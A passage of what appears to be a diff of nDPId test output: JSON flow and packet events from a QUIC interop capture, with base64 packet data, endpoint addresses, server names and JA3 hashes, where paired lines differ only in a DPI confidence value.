APOvqCelpE6WxYBAjJ6Ob9xQn5fw5KtiH1vTt2jIzGqg7h7x+eEG7EtskR3WXy2ULpj8avtEHxoIAYNFuma3Kw1Q5I+yp3gZXvCg80hvQ5yvTMTRFEFLv7e3AI9MWK1ez\/Gs92MjqKDjcFapzN8J0ncdbpf7VMM\/SAAAyn39VVA2B0eImPwbFAkVPm6q7XMvwTw43gkYyH+tIZCaiByTp2fz7f13zt5uWkHJ\/xdDxZ0QWMsgr23LTh8uX0dAi+gTSxGMdGZ+JMlIsaX0oCPfGb0HHLtAsXQYqZ0ZWPw28mWBYTpruOoNFb3DlX+6qExjK8WSy1ooe5+wJKkueb4Xmv\/UjHpZRrauceITr70pDmM\/h\/qmPnCS6hmsP17czX\/4rm35DUjFnD5mDlo+Qvw14FGc0FaI4S4lHwDgjoDtx1uxn3T6ZBIvh7IG+k1Jkwrdejn5+rYQQ7D+n0F6ra8Kary+Yp6IxTLgWMA39l4flYecvLvLbyaihe+bxuZ\/sXW44m\/I+rkIqDYksSpmtNCQoAiuTEaO8+G9TYcOPSiueZiWcspgw=="} -01004{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01004{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1603816434743,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434743,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAP7ZAAEAR7R\/AqAGAilu8k6XkEVEE7HdHzAoKCgoIR0aH1pvahxkAAETSPnSjK947ByD+BwPD1aG8hiXIT+yh1\/\/dJPToYueaTYmcm5W39inFapwMfwXtPNuHyuKzvQi4tEhoFP7o5cr7L\/YLfOvRTXCcf\/nBs2i0GOysW2g+q+ySQiTJnXYhgdgzrVd+5t3w\/PQw6fy9t\/m\/yds5zVgFZvkcK9+PBnMGkX69jNHZy\/lqJ01nDFjal9f8GD69jzEKMTGYvMSJQA7RNeC\/KD8eOpHjj9WBygsq6CUYIr8fo6US3BfgPq9gd0A0tmwg39CMW8XvWjfxQE42A0qdKexPHBHbO44RrgN1lYWHsF9KHFf0oG1zpJP\/biAOd06E+L4G8kH7VJLNs7ScFYpQk1sjfWbopJV2NDDRk5n\/u159T7mAS9TPir6Mkav0xo3zJWRpgX5F8BCPA+wy2ILkS4PSS1v0MrOJCoimlv1DqJ5OlW084DnCjwz8IJMv\/SKXa7+4NnVr\/\/ESvUHOac9wGGR1zXP9FI\/x3cL3p4u9H6RWhCPW4QyjHaemmC\/gfB\/0E+a4D2sYjszc275uEiiMk9YkT5MYHrBeYLCaU7Q8DxDwccUne3cpoJ4lHHcYLSLAlSL\/\/KY7h+VxvR+zoxuGflSDjAs1poqdo\/IUube0PEi4UTgbHuGAtXxbtiHSdrpAoua4+6szPVBhRGKex4yMRpVhbH8S+dN3Pyg3B24A0\/OVSzrM5pnJd27z5j0Gd+CA6I3BX8Yp+2hPRnK41jUW3bVktO7edHptm5sFjlFYICv0SOarAbQ6n2DmwLm92sqQh3QS9Lmm4WOx2XCagFIPZIDiZeLTTkq+aszsag6ixBzFj1pcSsByUB\/GhjosZxT0Gj4yUoAQIHzUTJg7J3nKc68zoJAksRF0IX4lzCTP2m7zWWuJzrV47gUbv+qb40KFRAbhbw5Dyw8fAJ3D9TlnxYIcqnqk4LMimkerR+VyVCXS\/6WHTRMPm4MtIHNddK1\/U\/48s6JsJR68VJBGumfircAqWj50LwIeATognNP1DIA70mG9JvdMDmO2oTwy6ySJN4Y3y06X7q3Z8NCtiC\/iI2uhGloDLFxuymBLemWj0VpyeCZG0yIpqIc1HEmv6XKNmjw7z8uZ8Y5Cfh3l0rF5wkKZKiS1xmPWaos69hnGAavOUwNzlyVD3k8VynbijwHzavIsoRY3BLDI4EUCUOPCvrOJTxW67HBmCCikO43iO+akkrn7xaV4Xo\/zs2kx7KWcSSCAiFYi2fQxAO4dtBo2lzxCU5sDKZWyE2j\/3FtfwJAdNdp2IztD++HqzRoQ387gULsMy0sNutEk1+pbY\/0fe+lCMT8UDYTOJkXwNxjYJql09DmDSST+acm9N1pvUw5rNb4b3q6LcSzpLxBR68KiN6n1WdGdEBNNLh4GVDxkIJvPtKALCuwiML8mF7tHe9HaxwxTrg\/pGssCVS5xDRj73Jovu\/IOG05VG5UNPKU18Acro3NlKckFYERDjRmsoE81UwYtkwm7N7d2F1WbVoupTw027C7AT7qM8FKZYTL16DfcvuloswPjS71+3GJDR59F44OqreAhoGhdcp+Xh8QSIYeTsyxnGWk0kqW4A4ueD9T9D7LMkceoPCCE+H9fBRiJlRLBVUKyk4ZJsKg4xzaX\/xksDV8yz35z5z93CJ\/IWw=="} -01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1603816434745,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434745,"pkt":"pJGxgjQ5PKn0qB\/sht1gBnpkBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRU25URUQTY3a\/ICgoKCgj9UoceU8iiQAAARL6ASJxduLYM4xsAvBTFbnnnMgyZmTRslgR5MTLzlGRvRpNyp8S8YSqhWi2EmIsbwpUo7wbHPWhyFPr99JEnZIlhcjYPyxEGseCwFKnV2A0\/LB+svcKwvaZro6Z2b6a5Qb2NXM0oceBQSsPvPMg08kktxPj6SOee45akgVhY4DzKTwOEuk83sHBjlwEQifFccsbM9rqqjEuAyt6JNZnZPoxNz1G+S71LAyfhU0K8u707IjCNbt043hVKiDAAP5Ls\/kOK5\/P5wqDCSLczv4J+lN2F6A33FYO\/MH2HOQiHb42Npm0EKTL+3SUNLPF87XHIdatFGKqcZkjBNCnSSbcZX2rEd6EUtj2nyhPr+r+nFeDhikrv+PxIFsc4VtD7WW0xDr26dPr5aSb061H45m8ZE0qNRBQR5tFZnbTGbyvde2q0Qpki81IBl6UJt1pUmavS5bxq5HrjSyr+NuMKr1axIeHUWwVKneV0bHR+2mJcQo9V+yDL+oVm6ynfkdvz+nfkBGIwjGTvIVMQdFq8yx2LVqO\/qhKk6WPhCoWu9SDfjAy3GRJgBH2n4\/AbuSFWy2FX3xB+FF8PVmqqU3lrXAwclcYyJxho6IWefEErywTT+xmJJToC+y\/V9RX\/POWQWAr70juowrxsRoO0Y3cHtF1mRnK77ko\/Z2bo+32+o7WcpTcj05oFRjeFzF\/bQhzfov7nC9AvF49NZTgKdU080+rsO\/a47JDDU9xRZIAdg7wur3suP\/23X5uAgAdvy9UfsMqaYaHuALSqzHmgmG+LU\/6oOzEiGUuM8xxO480fAsxJEYsa6aGv2IZSIrscvxw7PTjaAwUenIyoO3VqZ+CINAlZcJTfYDfC9Hoc9OdcdGsqCYKUW2wEzwexc9d2EUKPuBdQN2dXat5aWucUNWLDcCZgqT4lbJEnTA2hr0ad5eSaqS6BfcqZWuOLYKUHB67L8Lmnq2zuNtqKmvXXpYPuIvpGFWs7G7GD6CQFOGRklyTm3tEhq+17muIZPvSti1DEepk\/jf609KGeKiujNRiayZCXOCYOzkT28aBRRNckMsvT0LKNcigIKfjCDjIrh9aBkhLcgwpdGyl0y0h5hzDf\/4VXIhtMY0ORmfK1bAFgAlZBgLLfAp9\/vELXdZmlDRSB768DANFA4iwCGp8+E5loZtSnwVUJwBA4KRJzszszKovh\/eLZuleX\/lWlVGnatUN4nwRXaA1HElTOEdLlw6fZcHl\/Bdp4mHTJ8y+9+pA69KKpbmTruDVoXYkxoxHu9SNP1A3\/1SU74fa+4vsnpiYx3onvBAsr5gEzR0pL43F78fgO+m6gor7Et7VdeE4b0ZBmKRybKRoGjfTeCumdBa1nXpC30UmUVAo+zHRyQ1fZ2xkGMwXeR8l2HdsJlr15wXYvnfd6lL7qDoJjy440fHRTo9Bsr\/clAcx+A\/nz+C5jTYcda4m99NqYRLQUmM0ojNMm3OJF4cbzbp6ia5SamPyogQ1msqIhDfkv9Q2tHko55jTHfOK86Fc81Rz9PlrSPeKqSQiDiYO0Ad6xLICN\/o4TcHWtv1wNgnzDEw5LNMuaUGnl4D4FXXeGTZ793MSG1gIEgmaX3GvG52P40BhE04PqAmddEQ=="} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1603816434749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434749,"pkt":"PKn0qB\/spJGxgjQ5ht1gCsonACMRMSABGfAABQwhVAAB\/\/4zO5YgAQsHCsnVrqTT\/kdpHoB9EVGzHAAjCaG2AAAAAAAI2i99jGY\/xbL\/AAAd\/wAAHP8AABs="} 02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1603816434750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434750,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA8Y1AAEAREMTAqAGAR8opqZMdEVEE7OQ\/wwoKCgoIqaWx\/UJ+JLQAAETSC8vS9NYx\/piHxwl8s8tPMp6kRvO2UBaRMuZHcUr7jludPMV53ZjKHSEyJP+9E8\/YwfQgCjydB0456RwGo1\/cbqx+RH1Q8+a1Bo1DdJBYSWHzgdWM0CbI8YB14t04OHAilhwb5MlDY0NSInVq7T8MAzGcexUB7xgxT3QdMV0ajcdAA4QbbUxGpL\/JsbBCdpMKcKPK2DVQFnN0kkOHn9OlQg4o9cA4XLljFnTIscrDUPaU8cEzYClT6gYQP2jfUUOYkMZZULYk5bpXO7ax5xa50czA2ls0cdXBQf7YUbq+XEnU8cGtnVcx69nAz\/CACNjhFN4oROsXXKDcRVVrHQlIHQT9PZ1APNWYKwMR9C2+9u8dIrhct2cOe+7nRU5qzDx+30cas94Oc2UBgVvL4WrIGpSaoUpJWOS0GeDoGOZ\/NWWg33pgJHnq+fY7ZzZHaHkXZjK77y1bAHB5Tr17hCnN5b0yRFsFoYe9i3Wjp9k8hE3VZmn0SbrwA2HbX31Rwes9jjmIw\/os2DIcecacn2FrvDVlDqA+PQeIAXs\/2y71axQ4RLDic1gPyOF1NF3TOt80pLqz6lBzfCDO3rQH87n\/FiG2UQCjXUWyj00vQBE0K4S49nrAnDyF86E+RmqfHyjAEU7mfiLFjvU+SSLwbi\/fJZjzvnUDZSqjvi6f0IiNao51VPDI0VABW13IqPcImOawEl8JX5u0SQuxZjMaB+gkN47AMk5gGVpUcxeJ7Z9XwIs0K0lZDbqGWCXMCdIud52cUv5Q7a4BkzKCwhQfbEBvI2t+x0ewDQFUYQ17Lne1\/93MxOPU47Wf8TBSnv+VQbWOxLdCg2nECwvv8CsEtJFeZWh\/ha1cf4fZct1vISvq8GJAxKd76jGaP\/45zQLjR4HASo2rVXFn0L\/ETUkSvIfvqvSOkP0YtSO\/ZLn52LtlBuvcA71G0tQ37DmpzKxqMVV6sHgX3+zStA9c6eE7Wp\/gkgIS2yyC89rXKte79UGlVKqDYHmP54LWQ33xn\/ghDB5Udev516Q4LJ\/LYK1naDjh4zdtyWDOyHtV6dDjzohTwANBgk7tTb8qpeFDkvo\/5XKUnTRyFT6z1vDtwXisGZ3PyPwdthxyiwl227D+CWkoTh6C7df5\/ykCgFfvvCvgoQH8u8rshHs55PKOGBg5Hqs5deERSp3QXO5XGtS3KFrfrVEg6HdcbkCxSBW6ksxlYLzTFTTuuN3qPrqUBpBL+bmMKRSiOP1Qzjapvnxaf9gMa1yPSmZaOdEDbYJpPK7oha37il+Yc\/Ki35zS\/SKKrO9P2OR76tBQ1tVYddL33Ezyaaiyq3JlG\/nwWmfV5D2y+Js0\/lW0oPF+SLaGcNUfweLLinRJd+WusXgPVh9RJ+wX\/ykCIdqWlM284dJEMxAAj6BoI4wNZMRXYMh7U0nrCrpYSTFx7EaqFBm7HBPZbeFEUO8nxhWclcKvpJfe5Sf5yDohJz\/1ozHUKuzC9D3+QBJjDqURTWaAew7pm4H1KncN+qU8PnTQKXvs8sV4kCe3iQ+i0\/nVCMUjviEYY1\/hUg1AA4cxVLMRpwljkJ+SrVfWXClIk9dlebLFDCqTEzVG8u0wwo9BmMF63RqgLA7RedBbfzfYGr0pGXf\/l2NvPGQXqdbLDg=="} 00644{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434750,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1603816434750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434750,"pkt":"pJGxgjQ5PKn0qB\/sht1gAfkDBNgRQCABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWlyERUgTYFmvNCgoKCgjw7KzpNo8oeAAARL4tqmRQ5KPAPbdPUnedDn077kKWSLkPygVEwdGpIVFWcp2en9F3ERED+OnUg3d8i8AAkr44lz5aAq3LC+Q212cavhgupcuDcqNoIGhnCIfm+QSZcdNZ4zXfagNI0pLJoRsvOsL\/uXGYxbmgqR94yTDxQ0eUCVIZASIUeRZjEvJCthWVFT2rgBlBR7LYtLcvCmtn0DIMTAiPE\/xh01OGF5bAJQ2pznCPuONfdxbRDf26\/K7Vorl6tUQm\/NY5ROm8iHLzI4aMVUF0HjSu3+YUC1uhFUVddfTvpusRwaZ7kJNAa7P\/Vy96rw+N1QmHoKrViF3SiU98y7yZQbZlWxDFuBm3kfHuLnWeUnH4lwkgdmjgDw\/tGYT9JNO+a4WXT0WG+E149U5CDNgHVyClW14kVzq2L5mwgYWZMAo+lEamoeJB5h9+NMm0nQlLQivIZYDxop0vohOxK5n93lmaDplwC7Jat5ImroXJjGBA1i\/wWMXgstJIth+GejqRDCbbbeG7NxvZ9rVNx+l6f970K8CtZlugC3GRbFE9tMsDJl5zdBgPz83kXeLW4WfxGljbZ2I1\/Fsv5Dj9XTubdhAYt4ThM0knFSb5aX6Ff26rVq4Lfqy9HtKxEerRRn\/GPQ4yjlBfNoPdWIbjRC7TEbcUSnLf\/aCaXXZvuxf7r562GmcMeGxyHBQBVeTMDY1abEs7sWm\/+SOMgorJmIj9ISqcpplInrkBzayKhF83lHHurhCA1lrKNlSdpeepOLCf\/jMxhKTDSGOt6PuvUNMjvuJNj7JdWjB1qgt+7yg6GfadVoLlc7oKEmP2EZkbg1reAwAQOQU0SIVyNqN7R8++hQVFb9WO4t2FPgkjCkOeg8PKyC0+NKn6ths3s033xQ7XDByeP8Nn2kj5mf2ZY2gISmQLZEcrz0CUqG\/ia+5tqLKj4+\/Cndt6cFxpPnK+zzcl+5uVQbgnRXQJmrxZO\/AIu15jMIC2BXo7iG1s9T31lFVuK8ZWVw0cL8LlBKwlz8kc+VhdGPCJrGwt3wYzDhn2EetnDAIMnbnceC6ASm4ceWPn7zfseGSdZHnqg2ItW2chn2XlcQp4yI6MIqqKBep7wjkYIzq1Xg27JeDrqOB5eSz5nPdiU3VaODgQWCUUbg9ghrJZfwLkGvswGRALf+EzPBVkuJnFi0tcoasUB17bL2uvxmMJsQHWFO1QguLm7aeVi4DCA7LeprVfnREJzlwtTcq1k5DYJjUcopXIzceZ1RbGyvZp4+Cg3kMpFGVYKly62GUic6\/xL1lutLalr\/JjiJp45zRjU0jch7XG6sx+An4xZJK0US\/g0Kv\/HVtYynUrwZXu\/woHqvI9+NK8siaNZbHMUKRkIGOXCg9aT\/yvWLUSR9BuvtiEH\/8yVs7NtMMrdgpTQTivJT44BZN6SO0WXldGZUkYPP9OVZchj36EQYpACosyteNK+R\/3v7MWWO4pEsgkp64XBxw2OWJLRgsbR2Yz5fH7LkIbs0gEHDj7\/gcfuV5kb5ePRim1rmsSUQI+hvJlOF3Hyyb3A9HUl2d7fhX4v+4KZIvtThVaEaIsqv89pcU+EoZuJG6wojlAyR0dhaUyj7ezXTuA25fYN0yKiGFN29BfWA=="} -01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434750,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434750,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1603816434750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434750,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUANsZAAEARy4vAqAGAR8opqZMLAbsE7Ok\/zAoKCgoINqH1Vk80LhQAAETSoI4wdjcpvn01GyYGcs8WSPSlKPT4hY9r7ZqPT9FILv6mf0g+Sw+ruXz256wKfDlVUbQnhrO+J2WPPYXirISnHdW5UejVo+0GNbGGC7pxqEcspy5a\/AJGn9AlGBaUXuFdjU97Kn6GHsNBd6bdZ3+SRnRxnNzx3oqxje3M74CutehdUh9SD+lH8Ub\/n5kiikOxdihmi26CPsVygaeEpmQ\/ctjlgUeWzXeW6BI5VBRC\/SBTjQ1Jm5WM7UYSJc7206JIZFbkts5ijN4IYXYCa6dQPxtIUWKXQ3dvfDY7hKCYqYb0oQk8vNpd+VxLZ+X2tKF+cUI8Vxl+uQ1cyS7KRBFhSWWakuw6JqnPtneYuh2X0FsZcDWbR4iGUWVWgDg9Qw5cfvrP12Y\/yiLSLAGuKBuRr+bvLEH8tSrJRasEnvugWyA7qLDfZYZJnvH+JBBq7\/aECFTncu7StDcd8mUbn9I9AidCbV\/bMYXQlnSnKDQulxvXQ4dbJwT\/tlwiGidqTTeBgir9P1P3PCQxKDec98Req33hD33Pl1kOhW47JhAzt2PSVpD5yGFmdTiUtav0ZVZ4bVttJ50pPh0rwKfk06rey\/iamM+sc2+SMdjSdewqGqL+SInrOte3Zwu6gGMBTDH1Dyn1E0nmn0Tb\/Q1gEjU93vGLNsvKan5nMFqYWW2NNsruGSJ+9aJA9OOwdQMWK3sGUohqhR5oMULjwJwWB4Co1NNGczoGoTZkPBosjx1u8umd4oTn1Z2YEOsfq\/MS16\/Yc6JAedu\/au3dMTV8zUcm9uBg2LvP4HCYefsbA+hZ3OpRlBsm8QE5VwJdjLl9s5rMN33d4LYFMCKrf6QdIGj5c4fUlmgpdRq+dBGaSuAfzg0ku6d1UCGoNDQKc7loJPuEMWGVQQa3mEV9T3wFWWD6qST\/etOV4D\/sj1plYn1+smnFQBuQZSbZweVdNYukikzA14A8nweXxSHltQyCOoXoXsTnOodIRecC5axLme+KFXLONSqcF7oL989dNvADyfgfXeWjM56pSGw8v1frDP2WvRz\/9O2VASdSPymmk7eOvVaojgAkCWc585MWwdlDf2Bq\/0Eu3MuR5eBJAaTZqNMwminLUZSdyoyjLlJm2rZrJBLuK2gyXgKALsphtbmnZoJqw6TqoTKjr8UYtnFpWqENJDhQ5+ORa2Hcbq\/Dt4PwTSt+rPvIoSh7Jaterb+RkztGN0uVdPoKTy77oy3I5gH\/ftpi+zlnKzZWJcJk7cxUnYiLi2m\/syIsVA+rAGJ4eeYI0XnnqQO4AvGYQTCUgtaiahKO7UOHl88kFcJG4D8pQg2wwb5607JGDUPMhSYXsNIwTaOjnaJDy919gMoDn26JaGel3R8iazejn1O\/DzxXDINb0MonstAugqKgKVKjzgLZ\/csTsyHaMRIb0aSATuia50Le8I3Ve5TbTrO\/bIUVjBtgTrRKF9beL0OL2aHMhnVOyvZCYm2Rfh+hzhENK+ndpIFgdC09Qc1PCFaAc\/iWtEnOkRAICRVP\/n2wewDV4ofdczPB2YLwTo\/A4bp3k9J39KVcL+jkeKQH9hK9CryMQU2J\/VOD96l9ePlxO+jxkFCQ59EYKnbqkDYSz689nm86kaU5Ehu7UNB2XjaenWSjg+6wrw=="} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1603816434752,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434752,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAU1dAAEARXy7AqAGAjOM0XJOYAbsE7NI+zwoKCgoI8EYvtCcjifcAAETSbBDdIICaEFzEG1iH2xrezIkmzc81Se7Om4pMqi+fkG1ee5cmCW03EDIZCCsKAvFcaFK0xOPuVpbYZPxd25c0VKDC2\/IuslwjOlp8bug5TVX8ayHsiTo+lsvxl1UQybYSPktQa6tD8aJ1SYoje\/TUY\/5v\/R2x3Qgs8EMkrwm3yX346YWdgmSm1p7ceKPEy+zG5LRvC9shuVP1fHGwJ+1fA5BlvICvwLYIOkfS5qSoKKUy0u4Zz9f3Dl8wvOnZhXCK6i8j4NlIpdZHu5RJiAsAZ4LK1nC+Hkny64Ae6XYMfX+bXXmhr20i5ZKonuPmoXhEkpwdnfR7Q+F6EhX